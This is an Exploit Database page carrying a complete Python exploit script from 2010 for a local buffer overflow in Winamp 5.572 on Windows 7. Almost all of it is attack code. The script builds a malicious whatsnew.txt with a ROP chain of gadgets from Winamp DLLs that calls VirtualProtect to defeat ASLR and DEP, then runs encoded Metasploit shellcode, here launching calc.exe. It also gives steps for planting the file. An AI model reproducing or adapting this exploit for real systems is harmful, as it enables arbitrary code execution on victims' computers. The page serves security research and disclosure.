Winamp 5.572 (Windows 7) – Local Buffer Overflow (ASLR + DEP Bypass)

• Exploit Database
• 124 阅读

• 作者： Node
  日期： 2010-06-26
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/14068/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153

  #!/usr/bin/python   #Exploit Title: Winamp v5.572 Local BoF Exploit (Win7 ASLR and DEP Bypass) #Date: June 26, 2010 #Author: Node #Software Link: http://download.nullsoft.com/winamp/client/winamp5572_full_emusic-7plus_en-us.exe #Tested on: Windows 7 Ultimate x64 ENG #Badchars: '\x00\xff\x5c\x2f\x0a\x0d\x20' #Instructions: Replace generated whatsnew.txt with original in Winamp folder, Start Winamp, rightclick the flash symbol, "Nullsoft Winamp...", Version history     print "[+] Winamp_5.572_whatsnew.txt Win7 ASLR and DEP Bypass - by Node"   version = "Winamp 5.572"   rop = "A" * 540# Offset rop += "\x8a\x35\x84\x07" #0x0784358A :# PUSH ESP # POP ESI # RETN [Module : in_wm.dll] rop += "A"*16 rop += "\x8a\x3d\x14\x07" #0x07143D8A :# PUSH ESI # SUB AL,5E # XOR EAX,EAX # POP EBP # RETN [Module: zlib.dll] rop += "\xf7\xb8\x40\x07" #0x0740B8F7 :# XCHG EAX,EBP # RETN [Module : gen_ff.dll] rop += "\xd6\x5e\x65\x07" #0x07655ED6 :# ADD ESP,30 # RETN [Module : in_cdda.dll] rop += "0000" #VirtualProtect placeholder rop += "DDDD" #return address placeholder rop += "1111" #lpAddress placeholder rop += "2222" #dwsize placeholder rop += "3333" #flNewProtect placeholder rop += "\x60\xf6\x78\x07" # lpflOldProtect (0x0778f660 writable address in in_mp3.dll) rop += "A"*24 #---------------Grab a kernel32 pointer from the stack-------------------- rop += "\x74\x6c\x96\x07" #0x07966C74 :# XCHG EAX,EDX # RETN [Module : ml_local.dll] rop += "\x1a\x10\x09\x07" #0x0709101A :# XOR EAX,EAX # RETN[Module : libsndfile.dll] rop += "\x3a\xd8\x8d\x07"*4 #0x078DD83A :# ADD EAX,41 # RETN [Module : ml_disc.dll] rop += "\x67\x40\x5b\x07" #0x075B4067 :# MOV ECX,EAX # MOV EAX,ECX # RETN[Module : gen_ml.dll] rop += "\x65\x72\x0a\x07" #0x070A7265 :# ADD EAX,ECX # RETN[Module : libsndfile.dll] rop += "\x67\x40\x5b\x07" #0x075B4067 :# MOV ECX,EAX # MOV EAX,ECX # RETN[Module : gen_ml.dll] rop += "\x65\x72\x0a\x07" #0x070A7265 :# ADD EAX,ECX # RETN[Module : libsndfile.dll] rop += "\x3a\xd8\x8d\x07"*3 #0x078DD83A :# ADD EAX,41 # RETN [Module : ml_disc.dll] rop += "\x29\x13\x09\x07"*29 #0x07091329 :# INC EAX # RETN[Module : libsndfile.dll] rop += "\x74\x6c\x96\x07" #0x07966C74 :# XCHG EAX,EDX # RETN [Module : ml_local.dll] rop += "\xb3\x6a\x6c\x07" #0x076C6AB3 :# SUB EAX,EDX # RETN[Module : in_flv.dll] rop += "\xa7\x41\x11\x07" #0x071141A7 :# MOV EAX,DWORD PTR DS:[EAX] # RETN [Module : tataki.dll] #----------------------EAX=kernel32, ESI=start----------------------   #---------------Change kernel32 pointer to VirtualProtect()----------------- rop += "\x74\x6c\x96\x07" #0x07966C74 :# XCHG EAX,EDX # RETN [Module : ml_local.dll] rop += "\x1a\x10\x09\x07" #0x0709101A :# XOR EAX,EAX # RETN[Module : libsndfile.dll] rop += "\x3a\xd8\x8d\x07"*4 #0x078DD83A :# ADD EAX,41 # RETN [Module : ml_disc.dll] 104 rop += "\x67\x40\x5b\x07" #0x075B4067 :# MOV ECX,EAX # MOV EAX,ECX # RETN[Module : gen_ml.dll] rop += "\x65\x72\x0a\x07" #0x070A7265 :# ADD EAX,ECX # RETN[Module : libsndfile.dll] 208 rop += "\x67\x40\x5b\x07" #0x075B4067 :# MOV ECX,EAX # MOV EAX,ECX # RETN[Module : gen_ml.dll] rop += "\x65\x72\x0a\x07" #0x070A7265 :# ADD EAX,ECX # RETN[Module : libsndfile.dll] 410 rop += "\x67\x40\x5b\x07" #0x075B4067 :# MOV ECX,EAX # MOV EAX,ECX # RETN[Module : gen_ml.dll] rop += "\x65\x72\x0a\x07" #0x070A7265 :# ADD EAX,ECX # RETN[Module : libsndfile.dll] 820 rop += "\x67\x40\x5b\x07" #0x075B4067 :# MOV ECX,EAX # MOV EAX,ECX # RETN[Module : gen_ml.dll] rop += "\x65\x72\x0a\x07" #0x070A7265 :# ADD EAX,ECX # RETN[Module : libsndfile.dll] 1040 rop += "\x67\x40\x5b\x07" #0x075B4067 :# MOV ECX,EAX # MOV EAX,ECX # RETN[Module : gen_ml.dll] rop += "\x65\x72\x0a\x07" #0x070A7265 :# ADD EAX,ECX # RETN[Module : libsndfile.dll] 2080 rop += "\x08\x13\x8d\x07" #0x078D1308 :# SUB EAX,41 # RETN [Module : ml_disc.dll] 203f rop += "\xc6\xd7\x8d\x07" #0x078DD7C6 :# SUB EAX,20 # RETN [Module : ml_disc.dll] 201f rop += "\xec\x11\x09\x07"*4 #0x070911EC :# DEC EAX # RETN[Module : libsndfile.dll] 201b rop += "\x74\x6c\x96\x07" #0x07966C74 :# XCHG EAX,EDX # RETN [Module : ml_local.dll] rop += "\x10\x7d\x0b\x07" #0x070B7D10 :# ADD EAX,EDX # RETN[Module : libsndfile.dll] #---------------EAX=VirtualProtect(), ESI=start-----------------   #-------------Write VirtualProtect() to stack---------------------- rop += "\x82\x55\x40\x07"*12 #0x07405582 :# INC ESI # RETN[Module : gen_ff.dll] rop += "\x43\x5d\x6f\x07" #0x076F5D43 :# MOV DWORD PTR DS:[ESI],EAX # RETN [Module : in_midi.dll] #---------------EAX=VirtualProtect(),ESI=start+12(VP)-----------     #-------------Write return address---------------------- rop += "\xdd\xb7\x3e\x07" #0x073EB7DD :# MOV EAX,ESI # RETN[Module : gen_ff.dll] rop += "\x74\x6c\x96\x07" #0x07966C74 :# XCHG EAX,EDX # RETN [Module : ml_local.dll] rop += "\x1a\x10\x09\x07" #0x0709101A :# XOR EAX,EAX # RETN[Module : libsndfile.dll] rop += "\x45\x35\x10\x08" #0x08103545 :# ADD EAX,104 # POP EBP # RETN[Module : freetype.wac] rop +="AAAA" rop += "\x45\x35\x10\x08" #0x08103545 :# ADD EAX,104 # POP EBP # RETN[Module : freetype.wac] rop +="AAAA" rop += "\x45\x35\x10\x08" #0x08103545 :# ADD EAX,104 # POP EBP # RETN[Module : freetype.wac] rop +="AAAA" rop += "\x10\x7d\x0b\x07" #0x070B7D10 :# ADD EAX,EDX # RETN[Module : libsndfile.dll] rop += "\x82\x55\x40\x07"*4 #0x07405582 :# INC ESI # RETN[Module : gen_ff.dll] rop += "\x43\x5d\x6f\x07" #0x076F5D43 :# MOV DWORD PTR DS:[ESI],EAX # RETN [Module : in_midi.dll] #------------EAX=start+12+312(shellcode),EDX=start+12(VP),ESI=start+16------------   #-------------Write placeholder 1---------------------- rop += "\x82\x55\x40\x07"*4 #0x07405582 :# INC ESI # RETN[Module : gen_ff.dll] rop += "\x43\x5d\x6f\x07" #0x076F5D43 :# MOV DWORD PTR DS:[ESI],EAX # RETN [Module : in_midi.dll] #------------EAX=start+12+312(shellcode),EDX=start+12(VP),ESI=start+20------------   #-------------Write placeholder 2---------------------- rop += "\x89\xb3\x34\x08" #0x0834B389 :# XCHG EAX,EBX # RETN [Module : jnetlib.w5s] rop += "\x1a\x10\x09\x07" #0x0709101A :# XOR EAX,EAX # RETN[Module : libsndfile.dll] rop += "\x45\x35\x10\x08" #0x08103545 :# ADD EAX,104 # POP EBP # RETN[Module : freetype.wac] rop +="AAAA" rop += "\x45\x35\x10\x08" #0x08103545 :# ADD EAX,104 # POP EBP # RETN[Module : freetype.wac] rop +="AAAA" rop += "\x45\x35\x10\x08" #0x08103545 :# ADD EAX,104 # POP EBP # RETN[Module : freetype.wac] rop +="AAAA" rop += "\x82\x55\x40\x07"*4 #0x07405582 :# INC ESI # RETN[Module : gen_ff.dll] rop += "\x43\x5d\x6f\x07" #0x076F5D43 :# MOV DWORD PTR DS:[ESI],EAX # RETN [Module : in_midi.dll] #---------EAX = 0x30c(size 780),EBX = shellcode, ESI=start+24(placeholder 2), EDX=start+12(VP)--------------   #-------------Write placeholder 3---------------------- rop += "\x1a\x10\x09\x07" #0x0709101A :# XOR EAX,EAX # RETN[Module : libsndfile.dll] rop += "\x3a\xd8\x8d\x07" #0x078DD83A :# ADD EAX,41 # RETN [Module : ml_disc.dll] rop += "\xec\x11\x09\x07" #0x070911EC :# DEC EAX # RETN[Module : libsndfile.dll] rop += "\x82\x55\x40\x07"*4 #0x07405582 :# INC ESI # RETN[Module : gen_ff.dll] rop += "\x43\x5d\x6f\x07" #0x076F5D43 :# MOV DWORD PTR DS:[ESI],EAX # RETN [Module : in_midi.dll] rop += "\x74\x6c\x96\x07" #0x07966C74 :# XCHG EAX,EDX # RETN [Module : ml_local.dll] #--------EAX=start+12(VP), EBX=start+12+312(shellcode), ESI=start+28-----------     #----------fix EBP problem after call return---------------- rop += "\x89\xb3\x34\x08" #0x0834B389 :# XCHG EAX,EBX # RETN [Module : jnetlib.w5s] rop += "\x1a\x10\x09\x07" #0x0709101A :# XOR EAX,EAX # RETN[Module : libsndfile.dll] rop += "\xf7\xb8\x40\x07" #0x0740B8F7 :# XCHG EAX,EBP # RETN [Module : gen_ff.dll] rop += "\x89\xb3\x34\x08" #0x0834B389 :# XCHG EAX,EBX # RETN [Module : jnetlib.w5s] rop += "\x85\xe0\x09\x07" #0x0709E085 :# ADD EBP,EAX # RETN[Module : libsndfile.dll] #---------EAX=vp, EBX=?, EDX=40, ESI=start+28, EBP=vp--------   #----------------go to VirtualProtect()------------------- rop += "\xc1\xbb\x3c\x07" #0x073CBBC1 :# XCHG EAX,ESP # RETN [Module : gen_ff.dll] #------------------------bang!-----------------------------   nops = "\x90"*304   # msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\xff\x5c\x2f\x0a\x0d\x20' -t perl shellcode = ("\xbb\xd2\xaa\xfa\x33\x31\xc9\xb1\x33\xdb\xd3\xd9\x74\x24" + "\xf4\x5e\x83\xc6\x04\x31\x5e\x0b\x03\x5e\xd9\x48\x0f\xcf" + "\x35\x05\xf0\x30\xc5\x76\x78\xd5\xf4\xa4\x1e\x9d\xa4\x78" + "\x54\xf3\x44\xf2\x38\xe0\xdf\x76\x95\x07\x68\x3c\xc3\x26" + "\x69\xf0\xcb\xe5\xa9\x92\xb7\xf7\xfd\x74\x89\x37\xf0\x75" + "\xce\x2a\xfa\x24\x87\x21\xa8\xd8\xac\x74\x70\xd8\x62\xf3" + "\xc8\xa2\x07\xc4\xbc\x18\x09\x15\x6c\x16\x41\x8d\x07\x70" + "\x72\xac\xc4\x62\x4e\xe7\x61\x50\x24\xf6\xa3\xa8\xc5\xc8" + "\x8b\x67\xf8\xe4\x06\x79\x3c\xc2\xf8\x0c\x36\x30\x85\x16" + "\x8d\x4a\x51\x92\x10\xec\x12\x04\xf1\x0c\xf7\xd3\x72\x02" + "\xbc\x90\xdd\x07\x43\x74\x56\x33\xc8\x7b\xb9\xb5\x8a\x5f" + "\x1d\x9d\x49\xc1\x04\x7b\x3c\xfe\x57\x23\xe1\x5a\x13\xc6" + "\xf6\xdd\x7e\x8d\x09\x6f\x05\xe8\x09\x6f\x06\x5b\x61\x5e" + "\x8d\x34\xf6\x5f\x44\x71\x08\x2a\xc5\xd0\x80\xf3\x9f\x60" + "\xcd\x03\x4a\xa6\xeb\x87\x7f\x57\x08\x97\xf5\x52\x55\x1f" + "\xe5\x2e\xc6\xca\x09\x9c\xe7\xde\x69\x43\x7b\x82\x43\xe6" + "\xfb\x21\x9c\xe2");   trash = "B" * 600   expfile = open('whatsnew.txt','w') expfile.write(version + rop + nops + shellcode + trash) print "[+] whatsnew.txt generated." expfile.close()